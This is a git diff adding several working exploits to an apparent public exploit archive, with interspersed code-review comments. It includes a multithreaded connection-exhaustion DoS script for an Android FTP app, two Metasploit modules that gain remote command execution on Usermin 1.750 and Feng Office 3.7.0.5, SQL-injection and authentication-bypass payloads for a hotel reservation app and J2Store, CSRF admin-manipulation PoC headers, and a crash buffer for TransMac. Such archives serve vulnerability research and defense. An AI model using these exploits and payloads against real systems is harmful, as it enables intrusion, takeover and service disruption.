diff --git a/exploits/android/dos/46464.py b/exploits/android/dos/46464.py
new file mode 100755
index 000000000..c8eabb0f3
--- /dev/null
+++ b/exploits/android/dos/46464.py
@@ -0,0 +1,76 @@ +#!/usr/bin/env python +#coding: utf-8 + +# ************************************************************************ +# * Author: Marcelo Vázquez (aka s4vitar) * +# * FTP Server 1.32 Remote Denial of Service (DoS) * +# ************************************************************************ + +# Exploit Title: FTP Server 1.32 Remote Denial of Service (DoS) +# Date: 2019-02-26 +# Exploit Author: Marcelo Vázquez (aka s4vitar) +# Vendor: The Olive Tree +# Software Link: https://play.google.com/store/apps/details?id=com.theolivetree.ftpserver +# Category: Mobile Apps +# Version: <= FTP Server 1.32 +# Tested on: Android + +import socket, random, string, signal, ssl, argparse, sys +from time import sleep +from threading import Thread, active_count +from os import system, geteuid + +if geteuid() != 0: + print("\nPlease, run %s as root...\n" % sys.argv[0]) + sys.exit() + +stop = False + +def signal_handler(signal, frame): + global stop + stop = True + +def spam(target_ip, port): + while True: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.settimeout(2) + try: + s.connect((target_ip, port)) + except: + pass + if stop == True: + break + +if __name__ == '__main__': + + signal.signal(signal.SIGINT, signal_handler) + + if len(sys.argv) != 3: + print "\nUsage: python " + sys.argv[0] + " \n" + sys.exit(1) + + target = sys.argv[1] + port = int(sys.argv[2]) + + target_ip = socket.gethostbyname(target) + + system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port )) + system('iptables -A OUTPUT -d %s -p tcp --dport %d --tcp-flags RST RST -j DROP' %( target_ip, port )) + + threads = [] + + payload = '' + + for i in xrange(0,50): + t = Thread(target=spam, args=(target_ip, port,)) + threads.append(t) + t.start() + + while True: + + if active_count() == 1 or stop == True: + + system('iptables -D OUTPUT -d %s -p tcp --dport %d --tcp-flags FIN FIN -j DROP' %( target_ip, port )) + system('iptables -D OUTPUT -d %s -p tcp 
--dport %d --tcp-flags RST RST -j DROP' %( target_ip, port )) + print("") + break \ No newline at end of file diff --git a/exploits/linux/dos/46465.txt b/exploits/linux/dos/46465.txt new file mode 100644 index 000000000..06f3c2a1d --- /dev/null +++ b/exploits/linux/dos/46465.txt @@ -0,0 +1,31 @@ +#Exploit Title: Buffer overflow +# Date: 27-02-2019 +# Exploit Author: Dhiraj Mishra +# Vendor Homepage: https://webkit.org/ +# Software Link: https://gitlab.gnome.org/GNOME/epiphany +# Version: 2.23.90 +# Tested on: Linux 4.15.0-38-generic +# CVE: CVE-2019-8375 +# References: +# https://nvd.nist.gov/vuln/detail/CVE-2019-8375 +# https://www.inputzero.io/2019/02/fuzzing-webkit.html + +## Summary: +The UIProcess subsystem in WebKit, as used in WebKitGTK through 2.23.90 and +WebKitGTK+ through 2.22.6 and other products, does not prevent the script +dialog size from exceeding the web view size, which allows remote attackers +to cause a denial of service (Buffer Overflow) or possibly have unspecified +other impact, related to UIProcess/API/gtk/WebKitScriptDialogGtk.cpp, +UIProcess/API/gtk/WebKitScriptDialogImpl.cpp, and +UIProcess/API/gtk/WebKitWebViewGtk.cpp, as demonstrated by GNOME Web (aka +Epiphany). + +## PoC: + \ No newline at end of file diff --git a/exploits/linux/webapps/46468.rb b/exploits/linux/webapps/46468.rb new file mode 100755 index 000000000..dab4ae6ad --- /dev/null +++ b/exploits/linux/webapps/46468.rb 
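Review bot: In exploits/android/dos/46464.py the header names the affected app but never says how the denial of service arises, so a reader cannot turn it into a detection or a fix. From the visible code, 50 threads call `connect()` in a loop and never close the socket while two local iptables rules drop outgoing FIN and RST packets to the target, so the server presumably accumulates connections that are never torn down; I would add a comment such as `# Mechanism: connection exhaustion - sockets are opened and never closed; mitigate with per-source connection limits and idle timeouts on the FTP service`. The comment should also warn that the DROP rules are removed only in the final `while True` loop, so any other exit leaves them in the local OUTPUT chain of the machine that ran the script. On style, `random`, `string`, `ssl`, `argparse`, `sleep` and `payload` are unused, `threads` is filled but never read, and the bare `except: pass` hides every connect error.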
@@ -0,0 +1,287 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'uri' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Usermin 1.750 - Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability in Usermin + 1.750 and lower versions. This vulnerability has the same characteristics as the Webmin 1.900 RCE(EDB-46201). + Any user authorized to the "Java file manager" and "Upload and Download" fields, to execute arbitrary commands with root privileges. + Usermin is the most shared interface with users, so the vulnerability is dangerous. + In addition, "Running Processes" field must be authorized to discover the directory to be uploaded. + A vulnerable ".cgi" file can be printed on the original files of the Usermin application. + The vulberable file we are uploading should be integrated with the application. + Therefore, a ".cgi" file with the vulnerability belong to Usermin application should be used. + The module has been tested successfully with Usermin 1.750 over Debian 4.9.18. 
+ }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://pentest.com.tr/exploits/Usermin-1750-Remote-Command-Execution.html'] + ], + 'Privileged' => true, + 'Payload' => + { + 'DisableNops' => true, + 'Space' => 512, + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'generic perl ruby python telnet', + } + }, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Targets' => [[ 'Usermin <= 1.750', { }]], + 'DisclosureDate' => 'Feb 27 2019', + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(20000), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('USERNAME', [true, 'Usermin Username']), + OptString.new('PASSWORD', [true, 'Usermin Password']) + ], self.class) + end + +## +# Target and input verification +## + + def check + + peer = "#{rhost}:#{rport}" + + vprint_status("Attempting to login...") + + data = "user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" + + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/session_login.cgi", + 'cookie' => "redirect=1; testing=1", + 'data' => data + }, 25) + + if res and res.code == 302 and res.get_cookies =~ /usid/ + vprint_good "Login successful" + session = res.get_cookies.split("usid=")[1].split(";")[0] + print_status("#{session}") + else + vprint_error "Service found, but login failed" + return Exploit::CheckCode::Detected + end + + vprint_status("Attempting to execute...") + + command = "echo #{rand_text_alphanumeric(rand(5) + 5)}" + + res = send_request_cgi( + { + 'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(5)}|#{command}|", + 'cookie' => "redirect=1; testing=1; usid=#{session}" + }, 25) + + + if res and res.code == 200 and res.message =~ /Document follows/ + return Exploit::CheckCode::Vulnerable + else + return Exploit::CheckCode::Safe + end + + end + +## +# Exploiting phase +## + + def exploit + + peer = "#{rhost}:#{rport}" + + 
print_status("Attempting to login...") + + data = "page=%2F&user=#{datastore['USERNAME']}&pass=#{datastore['PASSWORD']}" + + res = send_request_cgi( + { + 'method' => 'POST', + 'uri' => "/session_login.cgi", + 'cookie' => "redirect=1; testing=1", + 'data' => data + }, 25) + + if res and res.code == 302 and res.get_cookies =~ /usid/ + session = res.get_cookies.scan(/usid\=(\w+)\;*/).flatten[0] || '' + if session and not session.empty? + print_good "Login successfully" + else + print_error "Authentication failed" + return + end + else + print_error "Authentication failed" + return + end + +## +# Directory and SSL verification for referer +## + ps = "#{datastore['SSL']}" + if ps == "true" + ssl = "https://" + else + ssl = "http://" + end + + print_status("Target URL => #{ssl}#{peer}") + + res1 = send_request_raw( + { + 'method' => "POST", + 'uri' => "/proc/index_tree.cgi?", + 'headers' => + { + 'Referer' => "#{ssl}#{peer}/sysinfo.cgi?xnavigation=1", + }, + 'cookie' => "redirect=1; testing=1; usid=#{session}" + }) + + if res1 and res1.code == 200 and res1.body =~ /Running Processes/ + print_status "Searching for directory to upload..." + stpdir = res1.body.scan(/perl.+usermin/).map{ |s| s.split("perl ").last }.map{ |d| d.split("miniserv").first }.map{ |d| d.split("miniserv").first } + dir = stpdir[0] + "file" + print_good("Directory to upload => #{dir}") + else + print_error "No access to processes or no upload directory found." 
+ return + end + + +## +# Loading phase of the vulnerable file +## + + boundary = Rex::Text.rand_text_alphanumeric(29) + + data2 = "-----------------------------{boundary}\r\n" + data2 << "Content-Disposition: form-data; name=\"upload0\"; filename=\"show.cgi\"\r\n" + data2 << "Content-Type: application/octet-stream\r\n\r\n" + data2 << "#!/usr/local/bin/perl\n# show.cgi\n# Output some file for the browser\n\n" + data2 << "$trust_unknown_referers = 1;\nrequire './file-lib.pl';\n&ReadParse();\nuse POSIX;\n" + data2 << "$p = $ENV{'PATH_INFO'};\nif ($in{'type'}) {\n\t# Use the supplied content type\n\t" + data2 << "$type = $in{'type'};\n\t$download = 1;\n\t}\nelsif ($in{'format'} == 1) {\n\t" + data2 << "# Type comes from compression format\n\t$type = \"application/zip\";\n\t}\n" + data2 << "elsif ($in{'format'} == 2) {\n\t$type = \"application/x-gzip\";\n\t}\n" + data2 << "elsif ($in{'format'} == 3) {\n\t$type = \"application/x-tar\";\n\t}\nelse {\n\t" + data2 << "# Try to guess type from filename\n\t$type = &guess_mime_type($p, undef);\n\t" + data2 << "if (!$type) {\n\t\t# No idea .. use the 'file' command\n\t\t" + data2 << "$out = &backquote_command(\"file \".\n\t\t\t\t\t quotemeta(&resolve_links($p)), 1);\n\t\t" + data2 << "if ($out =~ /text|script/) {\n\t\t\t$type = \"text/plain\";\n\t\t\t}\n\t\telse {\n\t\t\t" + data2 << "$type = \"application/unknown\";\n\t\t\t}\n\t\t}\n\t}\n\n# Dump the file\n&switch_acl_uid();\n" + data2 << "$temp = &transname();\nif (!&can_access($p)) {\n\t# ACL rules prevent access to file\n\t" + data2 << "&error_exit(&text('view_eaccess', &html_escape($p)));\n\t}\n$p = &unmake_chroot($p);\n\n" + data2 << "if ($in{'format'}) {\n\t# An archive of a directory was requested .. 
create it\n\t" + data2 << "$archive || &error_exit($text{'view_earchive'});\n\tif ($in{'format'} == 1) {\n\t\t" + data2 << "$p =~ s/\\.zip$//;\n\t\t}\n\telsif ($in{'format'} == 2) {\n\t\t$p =~ s/\\.tgz$//;\n\t\t}\n\t" + data2 << "elsif ($in{'format'} == 3) {\n\t\t$p =~ s/\\.tar$//;\n\t\t}\n\t-d $p || &error_exit($text{'view_edir'}.\" \".&html_escape($p));\n\t" + data2 << "if ($archive == 2 && $archmax > 0) {\n\t\t# Check if directory is too large to archive\n\t\tlocal $kb = &disk_usage_kb($p);\n\t\t" + data2 << "if ($kb*1024 > $archmax) {\n\t\t\t&error_exit(&text('view_earchmax', $archmax));\n\t\t\t}\n\t\t}\n\n\t" + data2 << "# Work out the base directory and filename\n\tif ($p =~ /^(.*\\/)([^\\/]+)$/) {\n\t\t$pdir = $1;\n\t\t" + data2 << "$pfile = $2;\n\t\t}\n\telse {\n\t\t$pdir = \"/\";\n\t\t$pfile = $p;\n\t\t}\n\n\t" + data2 << "# Work out the command to run\n\tif ($in{'format'} == 1) {\n\t\t" + data2 << "&has_command(\"zip\") || &error_exit(&text('view_ecmd', \"zip\"));\n\t\t" + data2 << "$cmd = \"zip -r $temp \".quotemeta($pfile);\n\t\t}\n\telsif ($in{'format'} == 2) {\n\t\t" + data2 << "&has_command(\"tar\") || &error_exit(&text('view_ecmd', \"tar\"));\n\t\t" + data2 << "&has_command(\"gzip\") || &error_exit(&text('view_ecmd', \"gzip\"));\n\t\t" + data2 << "$cmd = \"tar cf - \".quotemeta($pfile).\" | gzip -c >$temp\";\n\t\t}\n\t" + data2 << "elsif ($in{'format'} == 3) {\n\t\t&has_command(\"tar\") || &error_exit(&text('view_ecmd', \"tar\"));\n\t\t" + data2 << "$cmd = \"tar cf $temp \".quotemeta($pfile);\n\t\t}\n\n\tif ($in{'test'}) {\n\t\t" + data2 << "# Don't actually do anything if in test mode\n\t\t&ok_exit();\n\t\t}\n\n\t" + data2 << "# Run the command, and send back the resulting file\n\tlocal $qpdir = quotemeta($pdir);\n\t" + data2 << "local $out = `cd $qpdir ; ($cmd) 2>&1 "POST", + 'uri' => "/updown/upload.cgi?id=154739243511", + 'data' => data2, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; 
boundary=---------------------------{boundary}', + 'Referer' => "#{ssl}#{peer}/updown/?xnavigation=1", + }, + 'cookie' => "redirect=1; testing=1; usid=#{session}" + }) + + if res2 and res2.code == 200 and res2.body =~ /Saving file/ + print_good "Vulnerable show.cgi file was successfully uploaded." + else + print_error "Upload failed." + return + end +## +# Command execution and shell retrieval +## + print_status("Attempting to execute the payload...") + + command = payload.encoded + + res = send_request_cgi( + { + 'uri' => "/file/show.cgi/bin/#{rand_text_alphanumeric(rand(5) + 5)}|#{command}|", + 'cookie' => "redirect=1; testing=1; usid=#{session}" + }, 25) + + + if res and res.code == 200 and res.message =~ /Document follows/ + print_good "Payload executed successfully" + else + print_error "Error executing the payload" + return + end + + end + +end \ No newline at end of file diff --git a/exploits/php/webapps/46461.txt b/exploits/php/webapps/46461.txt new file mode 100644 index 000000000..e63d5f0a7 --- /dev/null +++ b/exploits/php/webapps/46461.txt @@ -0,0 +1,20 @@ +# Exploit Title: Simple Online Hotel Reservation System - SQL Injection / Authentication Bypass +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: February 25, 2019 +# Vendor Homepage: https://code-projects.org/ +# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ +# Tested on: Kali linux, Windows 8.1 + + +# PoC: + +# Authentication Bypass: + +# Go to admin login page (http://localhost/[PATH]/admin/index.php), then use below payload as username and password => Username: ' or 1 -- - + Password: ' or 1 -- - + +# SQL Injection: + +# http://localhost/[PATH]/admin/edit_room.php?room_id=4 [SQLi] +# http://localhost/[PATH]/admin/edit_room.php?room_id=-4%27union%20select%201,2,3,4%20--%20- \ No newline at end of file 
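Review bot: In exploits/linux/webapps/46468.rb, `check` prints the authenticated session id at normal verbosity with `print_status("#{session}")`, which puts a live `usid` cookie value into console output and engagement logs; I would drop that line or reduce it to `vprint_status("Session cookie received")`. Every upload request in this module carries the literal multipart boundary `---------------------------{boundary}`, because the string is written without `#`, and it goes to `/updown/upload.cgi` with the fixed `id=154739243511` and `filename="show.cgi"`; a comment recording these constants would help anyone writing a detection for the request. `peer` is assigned in `check` but not used there, and the `.map{ |d| d.split("miniserv").first }` step is applied twice in a row.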
diff --git a/exploits/php/webapps/46462.html b/exploits/php/webapps/46462.html new file mode 100644 index 000000000..0dca91889 --- /dev/null +++ b/exploits/php/webapps/46462.html @@ -0,0 +1,27 @@ +# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: February 25, 2019 +# Vendor Homepage: https://code-projects.org/ +# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + Add Admin + + +
+ +

+ +

+ +

+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46463.html b/exploits/php/webapps/46463.html new file mode 100644 index 000000000..9072f30ff --- /dev/null +++ b/exploits/php/webapps/46463.html @@ -0,0 +1,21 @@ +# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) +# Exploit Author: Mr Winst0n +# Author E-mail: manamtabeshekan[@]gmail[.]com +# Discovery Date: February 25, 2019 +# Vendor Homepage: https://code-projects.org/ +# Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ +# Tested on: Kali linux, Windows 8.1 + +# PoC: + + + + Delete Admin + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46467.txt b/exploits/php/webapps/46467.txt new file mode 100644 index 000000000..bc071f3ca --- /dev/null +++ b/exploits/php/webapps/46467.txt @@ -0,0 +1,25 @@ +# Exploit Title: J2Store Plugin for Joomla! < 3.3.6 - SQL Injection +# Date: 19/02/2019 +# Author: Andrei Conache +# Twitter: @andrei_conache +# Contact: andrei.conache[at]protonmail.com +# Software Link: https://www.j2store.org +# Version: 3.x-3.3.6 +# Tested on: Linux +# CVE: CVE-2019-9184 + + +1. Description: +J2Store is the most popular shopping/e-commerce extension for Joomla!. The SQL Injection found allows any visitor to run arbitrary queries +on the website. + + +2. Proof of Concept: + +- Parameter vulnerable: "product_option[j]" array (where j depends on entries) +- Example: [URL]/index.php?option=com_j2store&view=product&task=update&product_option[j]=%27%22%3E2&product_qty=1&product_id=XX&option=com_j2store&ajax=0&_=XXXXXXXXXX +- sqlmap: product_option[j]=%28CASE%20WHEN%20%284862%3D4862%29%20THEN%204862%20ELSE%204862%2A%28SELECT%204862%20FROM%20DUAL%20UNION%20SELECT%205348%20FROM%20DUAL%29%20END%29 + + +3. Solution: +Update to 3.3.7 \ No newline at end of file diff --git a/exploits/php/webapps/46471.rb b/exploits/php/webapps/46471.rb new file mode 100755 index 000000000..6738bb6fc --- /dev/null +++ b/exploits/php/webapps/46471.rb 
@@ -0,0 +1,137 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' +require 'uri' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::FileDropper + + def initialize + super( + 'Name' => 'Feng Office 3.7.0.5 - (Unauthenticated) Remote Command Execution', + 'Description' => %q{ + This module exploits arbitrary file upload vulnerability in Feng Office 3.7.0.5. + Application allows the unauthenticated users to upload arbitrary files. + There is no control of any session. All files are sent under "/tmp" directory. + The ".htaccess" file under the "/tmp" directory prevents files with the "php,php2,php3.." extensions. + This exploit creates the php payload and moves the payload to the main directory via "shtml". + After moving the php payload to the main directory, Exploit executes payload and receives shell. 
+ }, + 'Author' => [ + 'AkkuS <Özkan Mustafa Akkuş>', # Vulnerability Discovery, PoC & Msf Module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['URL', 'https://pentest.com.tr/exploits/Feng-Office-3-7-0-5-Unauthenticated-Remote-Command-Execution-Metasploit.html'], + ], + 'Platform' => ['php'], + 'Arch' => ARCH_PHP, + 'Targets' => + [ + ['Feng Office <= 3.7.0.5', {}] + ], + 'DisclosureDate' => '28 Feb 2019', + 'Privileged' => false, + 'DefaultTarget' => 0 + ) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The base path to Feng Office', '/']), + ], self.class) + end + + def exploit +## +# Upload Payload and directory discovery +## + boundary = Rex::Text.rand_text_alphanumeric(29) + + data = "-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"upload\"; filename=\"akkus.php\"\r\n" + data << "Content-Type: binary/octet-stream\r\n\r\n" + data << payload.encoded + data << "\n\r\n-----------------------------{boundary}--\r\n" + + + data << "-----------------------------{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}' + }, + 'uri' => normalize_uri(target_uri, "/ck_upload_handler.php") + }) + + + if not (res and res.body =~ /tmp\/([^\"]+)\',/) + print_error("Something went wrong. 
PHP File Upload failed.") + return nil + end + upfile = $1 + print_status("PHP Payload: #{upfile}") + + updir = res.body.scan(/.+ck_upload_handler.php/).map{ |s| s.split("in ").last }.map{ |s| s.split("").last }.map{ |s| s.split("ck_upload_handler.php").last } + dirc = updir[0] + print_status("Application Directory Path: #{dirc}") +## +# Upload shtml and run CMD command to move Payload to the main directory +## + + data = "-----------------------------{boundary}\r\n" + data << "Content-Disposition: form-data; name=\"upload\"; filename=\"akkus.shtml\"\r\n" + data << "Content-Type: text/html\r\n\r\n\r\n\r\n\n\r\n" + data << "-----------------------------{boundary}--\r\n" + + res = send_request_cgi({ + 'method' => 'POST', + 'data' => data, + 'headers' => + { + 'Content-Type' => 'multipart/form-data; boundary=---------------------------{boundary}' + }, + 'uri' => normalize_uri(target_uri, "/ck_upload_handler.php") + }) + + if not (res and res.body =~ /tmp\/([^\"]+)\',/) + print_error("Something went wrong. sHTML file Upload failed.") + return nil + else + print_good("Uploads successful completed.") + end + upfile2 = $1 + print_status("SHTML Payload: #{upfile2}") + print_good("#{peer} - Retrieving remote command shell...") + +## +# Running shtml for file migration +## + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/tmp/#{upfile2}"), + }) +## +# Running php for remote shell +## + send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri, "/#{upfile}"), + }) + + end +end +## +# End +## \ No newline at end of file diff --git a/exploits/windows/dos/46470.py b/exploits/windows/dos/46470.py new file mode 100755 index 000000000..2b4b45807 --- /dev/null +++ b/exploits/windows/dos/46470.py 
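Review bot: In exploits/php/webapps/46471.rb, `Msf::Exploit::FileDropper` is mixed in but nothing in `exploit` registers the two uploads, so as far as this hunk shows the files sent as `akkus.php` and `akkus.shtml` stay on the tested server, and the Description does not say so. I would add a sentence to the Description such as `After a test, remove the uploaded .php and .shtml files from the application directory and its tmp folder by hand.` The same text could name what a defender can act on: by the module's own description `ck_upload_handler.php` accepts files without a session and the `tmp` directory serves `.shtml`, so requiring authentication on the handler and disabling script and SSI execution under `tmp` are the mitigations this code implies. `initialize` also takes no `info` argument and skips `update_info`, unlike the other Metasploit module in this commit (46468.rb).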
@@ -0,0 +1,24 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: TransMac 12.3 - 'Volume name' Denial of Service (PoC)
+# Date: 27/02/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://www.acutesystems.com/
+# Software Link: https://www.acutesystems.com/tmac/tmsetup.exe
+# Version: 12.3
+# Tested on: Windows 10
+
+
+# Proof of Concept:
+# 1.- Run the python script "TransMac.py", it will create a new file "TransMac.txt"
+# 2.- Copy the content of the new file 'TransMac.txt' to clipboard
+# 3.- Open TransMac.exe
+# 4.- Go to File > New Disk Image
+# 5.- Paste clipboard in 'Volume name' field
+# 6.- Click on button -> Ok
+# 7.- Save the new disk with any name, e.g 'exploit.dmg'
+# 8.- Crashed
+
+buffer = "\x41" * 1000
+f = open ("TransMac.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 04a0230db..87daaf194 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
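Review bot: In exploits/windows/dos/46470.py the file is opened with `f = open ("TransMac.txt", "w")` and closed by hand, so the handle is not closed if `write` raises; `with open("TransMac.txt", "w") as f:` followed by `f.write(buffer)` is the idiomatic form. The name `buffer` also shadows the Python 2 builtin of the same name, and the header does not say which Python version the script targets. The steps refer to the script as "TransMac.py" while the file is committed as 46470.py, which is worth aligning in the comment.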
@@ -6336,6 +6336,9 @@ id,file,description,date,author,type,platform,port
 46445,exploits/android/dos/46445.c,"AirDrop 2.0 - Denial of Service (DoS)",2019-02-21,s4vitar,dos,android,
 46448,exploits/multiple/dos/46448.js,"WebKit JSC - reifyStaticProperty Needs to set the PropertyAttribute::CustomAccessor flag for CustomGetterSetter",2019-02-22,"Google Security Research",dos,multiple,
 46458,exploits/windows/dos/46458.py,"Xlight FTP Server 3.9.1 - Buffer Overflow (PoC)",2019-02-25,"Logan Whitmire",dos,windows,
+46464,exploits/android/dos/46464.py,"FTP Server 1.32 - Denial of Service",2019-02-28,s4vitar,dos,android,
+46465,exploits/linux/dos/46465.txt,"WebKitGTK 2.23.90 / WebKitGTK+ 2.22.6 - Denial of Service",2019-02-28,"Dhiraj Mishra",dos,linux,
+46470,exploits/windows/dos/46470.py,"TransMac 12.3 - Denial of Service (PoC)",2019-02-28,"Alejandra Sánchez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -40913,3 +40916,9 @@ id,file,description,date,author,type,platform,port
 46456,exploits/php/webapps/46456.txt,"News Website Script 2.0.5 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,
 46457,exploits/php/webapps/46457.txt,"Advance Gift Shop Pro Script 2.0.3 - SQL Injection",2019-02-25,"Mr Winst0n",webapps,php,
 46459,exploits/php/webapps/46459.py,"Drupal < 8.6.9 - REST Module Remote Code Execution",2019-02-25,leonjza,webapps,php,
+46461,exploits/php/webapps/46461.txt,"Simple Online Hotel Reservation System - SQL Injection",2019-02-28,"Mr Winst0n",webapps,php,
+46462,exploits/php/webapps/46462.html,"Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin)",2019-02-28,"Mr Winst0n",webapps,php,
+46463,exploits/php/webapps/46463.html,"Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin)",2019-02-28,"Mr Winst0n",webapps,php,
+46467,exploits/php/webapps/46467.txt,"Joomla! Component J2Store < 3.3.7 - SQL Injection",2019-02-28,"Andrei Conache",webapps,php,
+46468,exploits/linux/webapps/46468.rb,"Usermin 1.750 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,linux,
+46471,exploits/php/webapps/46471.rb,"Feng Office 3.7.0.5 - Remote Command Execution (Metasploit)",2019-02-28,AkkuS,webapps,php,